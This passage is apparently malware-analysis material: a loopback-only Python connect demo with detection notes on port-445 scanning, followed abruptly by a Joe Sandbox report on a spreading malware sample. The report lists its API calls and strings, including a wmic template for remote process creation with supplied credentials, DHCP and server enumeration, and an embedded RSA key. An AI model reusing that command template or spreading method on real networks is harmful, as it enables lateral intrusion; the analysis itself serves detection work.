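                received.append(conn.recv(1024))
        except OSError:
            pass
        finally:
            srv.close()

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    return port, received, t


def closed_loopback_port():
    """Pick a port that is currently free on loopback, so a connect to it is refused."""
    tmp = socket.socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
    tmp.bind(("127.0.0.1", 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


if __name__ == "__main__":
    port, received, t = start_capture_listener()
    print("open port   :", nonblocking_connect_and_send("127.0.0.1", port, PLACEHOLDER_PAYLOAD))
    t.join(5.0)
    print("listener got:", received)
    print("closed port :", nonblocking_connect_and_send("127.0.0.1", closed_loopback_port(), PLACEHOLDER_PAYLOAD))
```

The design point worth noting for detection is the select() timeout: it is what lets the spreader sweep an address range quickly, so on a network sensor this pattern shows up as a burst of short-lived SYNs to 445 from one host, many of them never completing.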

                                                APIs
                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000000,00000000,74DEDF60,74DEF380,?,02E58A84,02D95060,?,00000000), ref: 02E58963
                                                • WriteFile.KERNELBASE(00000000,02D95060,?,02E58A84,00000000,?,02E58A84,02D95060,?,00000000), ref: 02E5897A
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,02E58A84,02D95060,?,00000000), ref: 02E5898B
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                • String ID:
                                                • API String ID: 3805958096-0
                                                • Opcode ID: 2175b1db143e9a4d6cbc123688035274516e8ce7f585360e57e32934186e60d4
                                                • Instruction ID: 9299dc1f19cbad1e17a948154c822ab7635692ec3e94034e96cfcd958034816b
                                                • Opcode Fuzzy Hash: 2175b1db143e9a4d6cbc123688035274516e8ce7f585360e57e32934186e60d4
                                                • Instruction Fuzzy Hash: ADF0E232280239FB9B205E669C0CEFB7E6CFF466B5B044529FD19C1040D73088A1CAF2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000,?,00000000,?,02E57641,?,?,?,74DF0F10), ref: 02E573C4
                                                • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,02E57641,?,?,?,74DF0F10,?,02E57EB2), ref: 02E573DE
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,02E57641,?,?,?,74DF0F10,?,02E57EB2), ref: 02E573EF
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                • String ID:
                                                • API String ID: 3805958096-0
                                                • Opcode ID: b5191b5450ae4f7bc6e0d3c624f05c0bed5606932872945473406415cb59d328
                                                • Instruction ID: e5d813b8aa419fcf2a814917c970d4891b3445c540cc0ce2a66eb4b96bc9342c
                                                • Opcode Fuzzy Hash: b5191b5450ae4f7bc6e0d3c624f05c0bed5606932872945473406415cb59d328
                                                • Instruction Fuzzy Hash: 59F03A311801347BDA205A26DC8CEEBBE2CEB466F4F108011FD09C6190D7308961C6F0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 02E58320: PathFindFileNameW.SHLWAPI(C:\Windows\dllcm.dat,00000000,?,02E57DC9,?), ref: 02E5832B
                                                  • Part of subcall function 02E58320: PathCombineW.SHLWAPI(02E57DC9,C:\Windows\,00000000,?,02E57DC9,?), ref: 02E5833A
                                                  • Part of subcall function 02E58320: PathFindExtensionW.SHLWAPI(02E57DC9,?,02E57DC9,?), ref: 02E58347
                                                • PathFileExistsW.KERNELBASE(?,?), ref: 02E58381
                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,04000000,00000000), ref: 02E583A1
                                                • ExitProcess.KERNEL32(00000000), ref: 02E583B6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Path$File$Find$CombineCreateExistsExitExtensionNameProcess
                                                • String ID:
                                                • API String ID: 1261333597-0
                                                • Opcode ID: b79d3417471ed288c2a41689ae0478dc695c033c5079028f31bfc0f22444b0d7
                                                • Instruction ID: 1424c706afa778093f5ef17c473f6c0df11827d7f9aaa2d6a5e8cc594e036f5d
                                                • Opcode Fuzzy Hash: b79d3417471ed288c2a41689ae0478dc695c033c5079028f31bfc0f22444b0d7
                                                • Instruction Fuzzy Hash: 7EF0A7729912386BC624E671AC49FCB765D8F44655F440561BA05E3080EF20D9E58AE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNELBASE(?), ref: 02E5A282
                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02E5A2D2
                                                • HeapFree.KERNEL32(00000000), ref: 02E5A2D9
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$FreeProcessSleep
                                                • String ID:
                                                • API String ID: 1803097132-0
                                                • Opcode ID: 8b6d9f99bb62f8b39890f6735f993513e961824b8bf700e0fcf696df01fc5bc0
                                                • Instruction ID: 9021048b008fb881095400f2cee099445ca7fdb98c2d2e8b0ad7b53713f39dc2
                                                • Opcode Fuzzy Hash: 8b6d9f99bb62f8b39890f6735f993513e961824b8bf700e0fcf696df01fc5bc0
                                                • Instruction Fuzzy Hash: D3016D769A02386BDF10ABF69C44EDF77ADEF58244B445535FE05E2140EB24E4508BB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: malloc
                                                • String ID: @
                                                • API String ID: 2803490479-2766056989
                                                • Opcode ID: 5a8ed52218412ee9b2d07de46c5a312a5ffec01428d6fdd34498493a84d842c6
                                                • Instruction ID: 038e9615d11d481ee43045ce8b0d35455834ae21405c89c88dc874babac12357
                                                • Opcode Fuzzy Hash: 5a8ed52218412ee9b2d07de46c5a312a5ffec01428d6fdd34498493a84d842c6
                                                • Instruction Fuzzy Hash: B2C15D75A5076A8FCB14CFA8C4A05EEB7B1FF88304F24A56AEC15E7340E7349A52CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 02E56973: GetTickCount.KERNEL32 ref: 02E56973
                                                • NetServerGetInfo.NETAPI32(00000000,00000065,?,00000000,00000000,74DF0F10,?,?,02E58029,000000FF,?,?,?), ref: 02E582A8
                                                • NetApiBufferFree.NETAPI32(?,?,?,02E58029,000000FF,?,?,?), ref: 02E582C1
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: BufferCountFreeInfoServerTick
                                                • String ID:
                                                • API String ID: 2934114180-0
                                                • Opcode ID: 22b445b2cce8a4ec7079e8927949c94ef3b056bebe1e44b976c20109d4bc77b9
                                                • Instruction ID: 8a3d0ea2b3f58f69c64ecff036e9c4447a01f2369e33022b00f77b2c5b1367ea
                                                • Opcode Fuzzy Hash: 22b445b2cce8a4ec7079e8927949c94ef3b056bebe1e44b976c20109d4bc77b9
                                                • Instruction Fuzzy Hash: 421106767A03259FD724CE69DC81B6E77A9AB81B08F149129FD09CB180D770CD808650
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NetServerEnum.NETAPI32(00000000,00000065,?,000000FF,?,02CD6160,?,02CD6160,?), ref: 02E5798B
                                                • NetApiBufferFree.NETAPI32(?), ref: 02E57A08
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: BufferEnumFreeServer
                                                • String ID:
                                                • API String ID: 2429717511-0
                                                • Opcode ID: 70ec2b6c92435d37f1b330307dc3493bc96a30bdd0bb291cea410ac36797297e
                                                • Instruction ID: 59e2b7d665bb297f06fb17364cf741250f6c79153eca317ed4bcabb266ef1519
                                                • Opcode Fuzzy Hash: 70ec2b6c92435d37f1b330307dc3493bc96a30bdd0bb291cea410ac36797297e
                                                • Instruction Fuzzy Hash: 8D216A759A0269EBDB22CF44C840ADEFB79FF08708F219616FC15A2141D3709760CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 02E5669A
                                                • GetTickCount.KERNEL32 ref: 02E566A2
                                                  • Part of subcall function 02E52068: closesocket.WS2_32(?), ref: 02E52076
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountTickclosesocketmemset
                                                • String ID:
                                                • API String ID: 650736858-0
                                                • Opcode ID: 6a5b47d155990104362a5d683ac12f88bb5617b60cb6c954ab1bf51383d84f46
                                                • Instruction ID: 6e3cb23e3f01669dfec66af13dc27312632df433d94c09b9a9af4bf9a0e9bc14
                                                • Opcode Fuzzy Hash: 6a5b47d155990104362a5d683ac12f88bb5617b60cb6c954ab1bf51383d84f46
                                                • Instruction Fuzzy Hash: 15114836590229ABCF129FE1DC04FCF3F6AAF08784F509015FE0566164E736D928EBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • EnterCriticalSection.KERNEL32(?,00000000,00000000,?,?,02E572CA,00000001,00000000,?,02E56FFB,00000001,?), ref: 02E571E7
                                                • LeaveCriticalSection.KERNEL32(?,?,?,02E572CA,00000001,00000000,?,02E56FFB,00000001,?), ref: 02E5723E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave
                                                • String ID:
                                                • API String ID: 3168844106-0
                                                • Opcode ID: 4195180f94e38c078a682da19b1b18eaff47e56b7d2d7988631d7dc42f6957b1
                                                • Instruction ID: bf9e35fc83d6ae09d0e6992c549356195a180ec7fd7110a79679de8522ee73cf
                                                • Opcode Fuzzy Hash: 4195180f94e38c078a682da19b1b18eaff47e56b7d2d7988631d7dc42f6957b1
                                                • Instruction Fuzzy Hash: 74115779740A209FC725CF6AC884A5AF7E6BF88308B449529E84AC7311DB30E961CA50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • StrCmpIW.KERNELBASE(00000000,?), ref: 02E56EEF
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 466bc20b24b89237cf69b0bd00e40f0e536f501e40b38cbb06788b41bf867633
                                                • Instruction ID: 9ef1fac61f49faefb6557062c878ef00dd56af67834087526b59b1ccfa02732f
                                                • Opcode Fuzzy Hash: 466bc20b24b89237cf69b0bd00e40f0e536f501e40b38cbb06788b41bf867633
                                                • Instruction Fuzzy Hash: 00D05E310F5118EBCF015E64C808BAA7B98A700709F90D430BC19858A0CB31C2A0CA50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: malloc
                                                • String ID:
                                                • API String ID: 2803490479-0
                                                • Opcode ID: 8b9f1e7de51a05d65cdca8ef3dc6850c79ae64e5049bba69088b5044e6cb7cb1
                                                • Instruction ID: f935d74e8d2a908f087e05ec8c133f9d1d136afc9d22ee1ae6072be75956a710
                                                • Opcode Fuzzy Hash: 8b9f1e7de51a05d65cdca8ef3dc6850c79ae64e5049bba69088b5044e6cb7cb1
                                                • Instruction Fuzzy Hash: 96B0123309830D5B8F04FED8E986C6A77DCEA54620B40D416FD1C8F640D931F5104A64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CryptStringToBinaryW.CRYPT32(89FF33FF,00000000,00000001,00000000,?,00000000,00000000), ref: 02E51BC6
                                                • LocalAlloc.KERNEL32(00000040,?,Microsoft Enhanced RSA and AES Cryptographic Provider,?,?,?,02E51D43,?), ref: 02E51BD6
                                                • CryptStringToBinaryW.CRYPT32(MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y,00000000,00000001,00000000,?,00000000,00000000), ref: 02E51BF8
                                                • CryptDecodeObjectEx.CRYPT32(00010001,00000013,00000000,?,00000000,00000000,00000000,02E51D43), ref: 02E51C1A
                                                • LocalAlloc.KERNEL32(00000040,02E51D43,?,?,?,02E51D43,?), ref: 02E51C25
                                                • CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00000000,00000000,00000000,02E51D43), ref: 02E51C42
                                                • CryptImportKey.ADVAPI32(5708458B,?,02E51D43,00000000,00000000,02E51D4F,?,?,?,02E51D43,?), ref: 02E51C5A
                                                • LocalFree.KERNEL32(?,?,?,?,02E51D43,?), ref: 02E51C66
                                                • LocalFree.KERNEL32(?,?,?,?,02E51D43,?), ref: 02E51C6F
                                                Strings
                                                • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 02E51BD0
                                                • MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y, xrefs: 02E51BF3
                                                • `oHu, xrefs: 02E51BFE
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$Local$AllocBinaryDecodeFreeObjectString$Import
                                                • String ID: MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y$Microsoft Enhanced RSA and AES Cryptographic Provider$`oHu
                                                • API String ID: 4237161685-1840210459
                                                • Opcode ID: db1ee4c0367c372a52ce8e3dee089a4b2cac0e1d4384663a868e6cb69e1e5287
                                                • Instruction ID: 355128134c0ae263bf3172a03052c97eeb9e21ba3c4ece20172c1ac9b85428bb
                                                • Opcode Fuzzy Hash: db1ee4c0367c372a52ce8e3dee089a4b2cac0e1d4384663a868e6cb69e1e5287
                                                • Instruction Fuzzy Hash: FB3180B5951228BFDB249B96CD48EDFBF7DEF09794F004050F909A6150D3718A50DBB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 02E58B70: PathFindFileNameW.SHLWAPI(C:\Windows\dllcm.dat,?,?,02E59A11), ref: 02E58B80
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 02E598D8
                                                • PathAppendW.SHLWAPI(?,wbem\wmic.exe,?,00000104,?,00000001,00000000,?,02E59C21,?,?,?), ref: 02E598EC
                                                • PathFileExistsW.SHLWAPI(?,?,wbem\wmic.exe,?,00000104,?,00000001,00000000,?,02E59C21,?,?,?), ref: 02E598F3
                                                • wsprintfW.USER32 ref: 02E59913
                                                • wsprintfW.USER32 ref: 02E59927
                                                  • Part of subcall function 02E56BB0: wsprintfW.USER32 ref: 02E56BD3
                                                  • Part of subcall function 02E56BB0: EnterCriticalSection.KERNEL32(02E6F124,00000000,00000114,74DF0F00), ref: 02E56BFE
                                                  • Part of subcall function 02E56BB0: StrCatW.SHLWAPI(?,?), ref: 02E56C4C
                                                  • Part of subcall function 02E56BB0: StrCatW.SHLWAPI(?,02E6B110), ref: 02E56C52
                                                  • Part of subcall function 02E56BB0: LeaveCriticalSection.KERNEL32(02E6F124), ref: 02E56C65
                                                • wsprintfW.USER32 ref: 02E59968
                                                • GetLastError.KERNEL32(?,00000104,?,00000001,00000000,?,02E59C21,?,?,?), ref: 02E59971
                                                Strings
                                                • process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 , xrefs: 02E59921
                                                • %s /node:"%ws" /user:"%ws" /password:"%ws" , xrefs: 02E5990D
                                                • wbem\wmic.exe, xrefs: 02E598E6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wsprintf$Path$CriticalFileSection$AppendDirectoryEnterErrorExistsFindLastLeaveNameSystem
                                                • String ID: %s /node:"%ws" /user:"%ws" /password:"%ws" $process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 $wbem\wmic.exe
                                                • API String ID: 2006178707-1103320628
                                                • Opcode ID: 69e741de526cca3721cf766a5a0a0c2682ed0f18cb6832e5b42eaa943c03e5c5
                                                • Instruction ID: ed57b543029c28b4e26bbb844a42276c5acda148d418800416477e3a5ee900d6
                                                • Opcode Fuzzy Hash: 69e741de526cca3721cf766a5a0a0c2682ed0f18cb6832e5b42eaa943c03e5c5
                                                • Instruction Fuzzy Hash: 822101362E0315EBD7209FA0CC84EABB3EDAF49714B40A42AF946C3110EB70D1818B64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetComputerNameExW.KERNEL32(00000004,?,?,00000000,6F9B4950,00000000), ref: 02E590D1
                                                • DhcpEnumSubnets.DHCPSAPI(?,?,00000400,?,?,?), ref: 02E590F3
                                                • DhcpGetSubnetInfo.DHCPSAPI(00000000,?,?), ref: 02E5911F
                                                • DhcpEnumSubnetClients.DHCPSAPI(00000000,?,?,00010000,00000400,?,?), ref: 02E59158
                                                • htonl.WS2_32(00000000), ref: 02E59187
                                                • htonl.WS2_32(00000000), ref: 02E59195
                                                • inet_ntoa.WS2_32(00000000), ref: 02E59198
                                                  • Part of subcall function 02E56916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,02E591A4,000000FF,00000000,00000000,00000000,00000000,74D65350,?,02E591A4,00000000), ref: 02E56935
                                                  • Part of subcall function 02E56916: GetProcessHeap.KERNEL32(00000000,00000000,?,02E591A4,00000000), ref: 02E56942
                                                  • Part of subcall function 02E56916: HeapAlloc.KERNEL32(00000000,?,02E591A4,00000000), ref: 02E56949
                                                  • Part of subcall function 02E56916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,02E591A4,000000FF,00000000,00000000,?,02E591A4,00000000), ref: 02E56961
                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 02E591B6
                                                • HeapFree.KERNEL32(00000000), ref: 02E591BD
                                                • DhcpRpcFreeMemory.DHCPSAPI(00000400), ref: 02E591D2
                                                • DhcpRpcFreeMemory.DHCPSAPI(?), ref: 02E591EB
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Dhcp$Heap$Free$ByteCharEnumMemoryMultiProcessSubnetWidehtonl$AllocClientsComputerInfoNameSubnetsinet_ntoa
                                                • String ID:
                                                • API String ID: 4121633671-0
                                                • Opcode ID: 595173263136ffa2cfd7688aa97d2bd0b6cc592b4399e2b52e685f81238b2c00
                                                • Instruction ID: da1890e927ecb4750347e80c736c006e2850e6e13d4890745c890e8fef07111f
                                                • Opcode Fuzzy Hash: 595173263136ffa2cfd7688aa97d2bd0b6cc592b4399e2b52e685f81238b2c00
                                                • Instruction Fuzzy Hash: C141F6B1D50229EFCB11DFA9D9889EEFBB9FF08304F518456EA01E7210D7709A418FA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CryptExportKey.ADVAPI32(?,?,00000001,00000000,00000000,?,F0000000,?,Microsoft Enhanced RSA and AES Cryptographic Provider,?,02E51D54,F0000000,?), ref: 02E51CA6
                                                • LocalAlloc.KERNEL32(00000040,?,?,02E51D54,F0000000,?), ref: 02E51CB1
